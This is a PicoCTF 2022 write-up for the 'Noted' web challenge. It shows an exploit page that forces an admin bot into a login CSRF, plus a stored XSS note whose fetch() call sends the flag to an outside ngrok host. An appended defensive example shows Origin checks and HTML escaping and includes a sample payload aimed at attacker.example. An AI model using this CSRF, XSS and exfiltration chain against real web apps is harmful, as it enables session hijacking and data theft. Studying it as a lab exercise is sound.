
PicoCTF 2022: Noted

TL;DR

  • The app allows users to create notes rendered as raw HTML.
  • Notes are viewed by an admin bot that is logged into an admin session.
  • No CSRF protection on the login endpoint.
  • Use a malicious HTML page to force the admin to log into your account.
  • Store an XSS payload in your notes that runs in the admin context.
  • When the admin views the notes, steal the flag via DOM access and exfiltration.

Video Walkthrough

[Video: PicoCTF 2022 Noted web exploitation walkthrough showing CSRF login abuse and stored XSS flag exfiltration]

Description

Web Challenge: I made a nice web app that lets you take notes. I'm pretty sure I've followed all the best practices, so it's definitely secure, right?

Solution

exploit.html

<body>
    <p>flag plz</p>
    <form action="http://0.0.0.0:8080/login" method="POST" id="loginForm">
        <input type="text" name="username" value="admin" />
        <input type="password" name="password" value="admin" />
        <input type="submit" value="Submit" />
    </form>
    <script>
        // Open notes in new window (containing the flag)
        window.open("http://0.0.0.0:8080/notes", "flagWindow");
        // Force admin to login to our account
        loginForm.submit();
        // When the admin arrives to our account, our XSS note will steal the flag:
        /* <script>let flagWindow = window.open('', 'flagWindow'); let flag = flagWindow.document.documentElement.innerText; fetch('http://3297-81-103-153-174.ngrok.io?flag=' + flag);<//script> */
    </script>
</body>
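The chain works because of the two defects named in the TL;DR: the login endpoint accepts cross-site form posts, and notes are rendered as raw HTML. The following added example (not part of the original writeup or the challenge's own code) shows the two server-side checks that break it; APP_ORIGIN is assumed to match the challenge URL used in exploit.html, and the sample requests are constructed.

```javascript
// Added example, not code from the original writeup. APP_ORIGIN is an
// assumption matching the challenge URL used in exploit.html.
const APP_ORIGIN = "http://0.0.0.0:8080";

function lowerKeys(headers) {
  return Object.fromEntries(
    Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]),
  );
}

// 1. Login CSRF: the forced login is a form post from the attacker's page, so
// the browser sends Origin (and Sec-Fetch-Site: cross-site) for that page.
// Reject POST /login unless the browser vouches it came from our own origin.
// SameSite=Lax on the session cookie does not help here: the attack does not
// reuse an existing cookie, it creates a brand-new session for the admin.
function isSameOriginLogin(headers) {
  const h = lowerKeys(headers);
  const site = h["sec-fetch-site"];
  if (site !== undefined && site !== "same-origin") return false;
  let origin = h["origin"];
  if (origin === undefined && h["referer"] !== undefined) {
    try { origin = new URL(h["referer"]).origin; } catch { return false; }
  }
  // No Origin/Referer at all on a state-changing POST: fail closed.
  return origin === APP_ORIGIN;
}

// 2. Stored XSS: notes were rendered as raw HTML. Escaping the five HTML
// metacharacters turns a stored <script> note into inert text.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

function renderNote(note) {
  return `<div class="note">${escapeHtml(note)}</div>`;
}

// Constructed sample requests mirroring the writeup's two steps.
const forcedLogin = { Origin: "http://attacker.example", "Sec-Fetch-Site": "cross-site" };
const realLogin = { Origin: APP_ORIGIN, "Sec-Fetch-Site": "same-origin" };
const storedNote = "<script>fetch('http://attacker.example?flag=' + document.body.innerText)</script>";

console.log("forced login accepted:", isSameOriginLogin(forcedLogin)); // false
console.log("real login accepted:", isSameOriginLogin(realLogin));     // true
console.log(renderNote(storedNote)); // &lt;script&gt;... rendered as text
```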